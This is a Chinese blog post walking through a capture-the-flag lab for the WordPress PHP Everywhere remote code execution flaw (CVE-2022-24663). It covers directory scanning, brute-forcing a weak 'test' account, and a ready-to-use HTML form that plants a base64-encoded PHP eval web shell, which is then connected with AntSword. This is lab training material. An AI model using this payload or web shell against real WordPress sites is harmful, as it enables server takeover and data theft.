春秋云境CVE-2022-24663

最新推荐文章于 2024-07-19 09:50:01 发布
最新推荐文章于 2024-07-19 09:50:01 发布
阅读量450 收藏 8
点赞数 8
分类专栏: 春秋云境 文章标签: android web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136954312
版权
本文详细描述了一次针对远程代码执行漏洞的攻击过程,包括使用dirmap扫描发现后台、弱口令爆破获取权限,以及利用PHPEverywhere执行代码上传shell并连接蚁剑。作者强调了从公开资源获取POC进行攻击的便捷性。
摘要由CSDN通过智能技术生成

简介

远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令

正文

进入首页我们没看到任何有价值的东西,那么就只好去寻找后台登录界面咯。

dirmap扫描后台

既然要找后台界面,那么我们就直接上dirmap吧,不浪费时间了。

python dirmap.py -i http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com -lcf

成功找到后台登录界面http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-login.php

进入登录界面,那么就开始尝试弱口令爆破。首先还是admin/admin不行,那就直接上字典爆破,可惜没爆出来,那么没爆出来那就只能尝试其他的账号了,然后测试发现存在test账号,那就继续爆破

弱口令爆破

直接爆破出来test/test

换上poc

靶场告诉我们在后台的任意界面都可以进行php代码的执行,那就直接在首页进行,直接f12修改源码,随便找一个div进去,点击一下鼠标右键,点击编辑html然后吧内容全部删掉。换上这个。

<form action="http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/huahua.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJodWFodWEiXSk7Pz4=")); ?>[/php_everywhere]</textarea>
      <input type="submit" value="Execute" />
</form>

注意

其中在第一行需要换上自己靶场的地址。

在第三行我们需要换上自己定义的界面,我在这里定义的界面是huahua.php

后面base64解码的意思是<?php @eval($_POST["huahua"]);?>直接注入shell。

上传成功

然后就会出现一个这样的框框,点击execute,就会自动跳转到http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php界面。当我们看到这个ture的时候,就代表我们上传成功了。

上文也说了,我创建的界面是huahua.php我们直接访问

http://eci-2zeayjyoklzboi3oj0ea.cloudeci1.ichunqiu.com/huahua.php

成功浏览到这个界面,

蚁剑连shell

那么就直接打开蚁剑开始连shell。

结束

进入根目录直接找到flag

小结

这关没什么好说的,网上有很多的poc,我们只需要把poc拿来就可以直接注入成功了,当然我们不上传shell也可以上传命令执行,一样可以做出来。只是我觉得上shell方便就没有上命令执行了。

是花花呢
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2022-24663复现
qq_70303095的博客
03-06 356
CVE-2022-24663复现
春秋云境CVE-2022-24663
一只爱吃橙子的羊
12-01 1425
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
春秋云境CVE-2022-24663复现
小高工作室
11-24 2378
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
春秋云境 CVE-2022-4230过关
weixin_49898946的博客
05-02 1255
春秋云境 CVE-2022-4230 获取flag
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2373
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
【16】Android基础知识之Window(二) - ViewRootImpl
mr_zengkun的博客
07-16 622
ViewRootImpl、WMS、绘制、硬件加速
Android系统启动】 Android Zygote 进程启动流程源码解析
thirdbro的博客
07-17 678
在 userdebug 版本中,如果 persist.debug.dalvik.vm.jdwp.enabled 为 1,则所有应用均可使用 JDWP 和 ptrace 进行调试。题外话, 之前找zygote源码的时候,本来想直接通过进程名找这个模块的源码,结果发现根本没有zygote这个名字的命令。通过命令查找到对应的进程目录发现,原来的进程的名字当时编译为。通过上面传下来的参数,“com.android.internal.os.ZygoteInit”,可以得知Java层的包名,以此找到Java代码。
Android】视图与常用控件总结
Patrick_yuxuan的博客
07-17 935
属性名描述android:id为视图分配唯一的ID,用于在代码中引用设置视图的宽度设置视图的高度设置视图的外边距设置视图的内边距设置视图在其父视图中的对齐方式(仅适用于ViewGroup的子视图)设置视图内容的对齐方式设置视图的背景颜色或图片设置视图的可见性(visibleinvisiblegone设置视图在线性布局中的权重(仅适用于设置视图是否与父视图的顶部对齐(仅适用于设置视图是否与父视图的底部对齐(仅适用于设置视图是否在父视图中居中(仅适用于设置视图在另一视图的下面(仅适用于。
简单Wordpress小工具开发
地衣君的博客
07-16 1172
记录简单的wordpress小工具开发,以简单的格言打印为例。
Polaris系列-02.启动分析一
suanhengzi的博客
07-16 476
如果环境变量配置了 MYSQL_USER=root, 那么yaml配置内容中${MYSQL_USER} 或者 $MYSQL_USER 解析读取后的内容会被替换成 root。里面有协程,锁,通过time.Ticker任务调度 等设计理念和实战,不了解的值得去好好看看的。即如果环境变量中配置了相应值,会替换yaml配置中的内容,熟悉Java的或者知道正则中的。上图中297行正是添加任务:处理滚动日志,这也好理解:别让一个日志文件太大,定时切割。后续有 初始化存储,启动流程,初始化插件,加载数据等。
Android init.rc如何并行执行任务
netwalk的专栏
07-17 1059
Android 系统中,init.rc 是一个重要的启动脚本,用于定义系统启动时需要执行的服务、操作和初始化任务,也是用来配置系统启动时的各种服务、属性和动作的脚本文件。虽然 init.rc 文件本身是一个序列化的配置文件,init.rc 文件中的命令通常按顺序执行,但 Android 的 init 进程和 init.rc 文件中的机制允许一定程度的并行执行任务,通过特定的机制,Android 也支持并行执行 init.rc 中的命令。
Android】传给后端的Url地址被转码问题处理
ganshenml的专栏
07-17 303
在 Gson 中,默认情况下会对某些特殊字符进行 HTML 转义,以确保生成的 JSON 字符串在 HTML 中是安全的。因此,字符 = 会被转义为 \u003d。你可以通过禁用 HTML 转义来避免这种情况。为什么使用Gson().toJson的时候,字符串中的=会被转成\u003d。
include merge 中可以使用 android:layout_width, android:layout_height 吗
阿饱同学
07-16 364
在标签中,可以使用和来控制包含布局的尺寸和位置。在标签中,通常不直接使用和属性,而是在包含的父布局中设置这些属性。这些理解有助于更好地利用和标签来优化布局和提高复用性。---- 文章由 ChatGPT 生成。
Android】使用视图绑定ViewBinding来代替findViewById
最新发布
Patrick_yuxuan的博客
07-19 1657
ViewBinding 是 Android 开发中的一个功能,它简化了访问视图的过程,避免了使用的繁琐步骤。它通过生成与布局文件相对应的绑定类,使得我们能够以类型安全的方式访问布局中的视图。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值